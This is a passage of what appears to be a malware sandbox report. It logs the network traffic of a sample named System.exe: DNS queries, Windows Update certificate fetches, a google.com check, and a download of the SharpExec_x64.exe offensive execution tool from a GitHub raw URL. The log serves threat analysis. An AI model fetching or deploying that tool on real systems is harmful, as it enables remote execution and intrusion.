                                                                                                                                                    X-Fastly-Request-ID: 89b0977939abc7bee813b85d5878426a92bce716
                                                                                                                                                    Expires: Thu, 18 Jun 2020 04:33:29 GMT
                                                                                                                                                    Source-Age: 11
                                                                                                                                                  • flag-unknown
                                                                                                                                                    DNS
                                                                                                                                                    www.download.windowsupdate.com
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    www.download.windowsupdate.com
                                                                                                                                                    IN A
                                                                                                                                                    Response
                                                                                                                                                    www.download.windowsupdate.com
                                                                                                                                                    IN CNAME
                                                                                                                                                    wu-fg-shim.trafficmanager.net
                                                                                                                                                    wu-fg-shim.trafficmanager.net
IN CNAME 2-01-3cf7-0009.cdx.cedexis.net
2-01-3cf7-0009.cdx.cedexis.net IN CNAME fg.download.windowsupdate.com.c.footprint.net
fg.download.windowsupdate.com.c.footprint.net IN A 8.238.24.126
fg.download.windowsupdate.com.c.footprint.net IN A 67.27.153.126
fg.download.windowsupdate.com.c.footprint.net IN A 8.238.20.126
fg.download.windowsupdate.com.c.footprint.net IN A 8.247.211.126
fg.download.windowsupdate.com.c.footprint.net IN A 8.238.21.254
• GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab  System.exe
  Remote address: 8.238.24.126:80
  Request
  GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
  Cache-Control: max-age = 3600
  Connection: Keep-Alive
  Accept: */*
  If-Modified-Since: Tue, 21 Apr 2020 00:50:26 GMT
  If-None-Match: "03582d87617d61:0"
  User-Agent: Microsoft-CryptoAPI/6.1
  Host: www.download.windowsupdate.com
  Response
  HTTP/1.1 200 OK
  Date: Thu, 18 Jun 2020 04:10:49 GMT
  Content-Type: application/vnd.ms-cab-compressed
  Content-Length: 58383
  Connection: keep-alive
  Cache-Control: public, max-age=3600
  ETag: "0597791bc2cd61:0"
  Expires: Thu, 18 Jun 2020 05:10:49 GMT
  Last-Modified: Mon, 18 May 2020 02:32:26 GMT
  Server: Microsoft-IIS/10.0
  X-Powered-By: ASP.NET
  X-CID: 3
  X-CCC: NL
  MSREGION: EMEA
  Age: 1060
  Accept-Ranges: bytes
• GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab  System.exe
  Remote address: 8.238.24.126:80
  Request
  GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
  Cache-Control: max-age = 3600
  Connection: Keep-Alive
  Accept: */*
  If-Modified-Since: Mon, 18 May 2020 02:32:26 GMT
  If-None-Match: "0597791bc2cd61:0"
  User-Agent: Microsoft-CryptoAPI/6.1
  Host: www.download.windowsupdate.com
  Response
  HTTP/1.1 304 Not Modified
  Date: Thu, 18 Jun 2020 04:10:49 GMT
  Connection: keep-alive
  Cache-Control: public, max-age=3600
  ETag: "0597791bc2cd61:0"
  Expires: Thu, 18 Jun 2020 05:10:49 GMT
  Last-Modified: Mon, 18 May 2020 02:32:26 GMT
  Server: Microsoft-IIS/10.0
  X-Powered-By: ASP.NET
  X-CID: 3
  X-CCC: NL
  MSREGION: EMEA
  Age: 1060
• 172.217.168.196:443  https://www.google.com/  tls, http  System.exe  1.5kB  54.1kB  25  41
    HTTP Request: GET https://www.google.com/
    HTTP Response: 200
• 151.101.0.133:443  https://raw.githubusercontent.com/anthemtotheego/SharpExec/master/CompiledBinaries/SharpExec_x64.exe  tls, http  System.exe  1.4kB  36.6kB  22  30
    HTTP Request: GET https://raw.githubusercontent.com/anthemtotheego/SharpExec/master/CompiledBinaries/SharpExec_x64.exe
    HTTP Response: 200
• 8.238.24.126:80  http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab  http  System.exe  1.8kB  61.3kB  27  45
    HTTP Request: GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    HTTP Response: 200
    HTTP Request: GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    HTTP Response: 304
• 10.7.0.255:137  netbios-ns  1.2kB  14
• 224.0.0.252:5355  100 B  2
• 8.8.8.8:53  www.google.com  dns  60 B  76 B  1  1
    DNS Request: www.google.com
    DNS Response: 172.217.168.196
• 8.8.8.8:53  raw.githubusercontent.com  dns  71 B  170 B  1  1
    DNS Request: raw.githubusercontent.com
    DNS Response: 151.101.0.133, 151.101.64.133, 151.101.128.133, 151.101.192.133
• 8.8.8.8:53  www.download.windowsupdate.com  dns  76 B  296 B  1  1
    DNS Request: www.download.windowsupdate.com
    DNS Response: 8.238.24.126, 67.27.153.126, 8.238.20.126, 8.247.211.126, 8.238.21.254
• 10.7.0.255:3  System.exe  130 B  1
• 10.7.0.255:3  System.exe  130 B  1
• 10.7.0.255:3  System.exe  130 B  1
• 10.7.0.255:3  System.exe  130 B  1
• 239.255.255.250:1900  966 B  6
• 239.255.255.250:1900

MITRE ATT&CK Enterprise v6
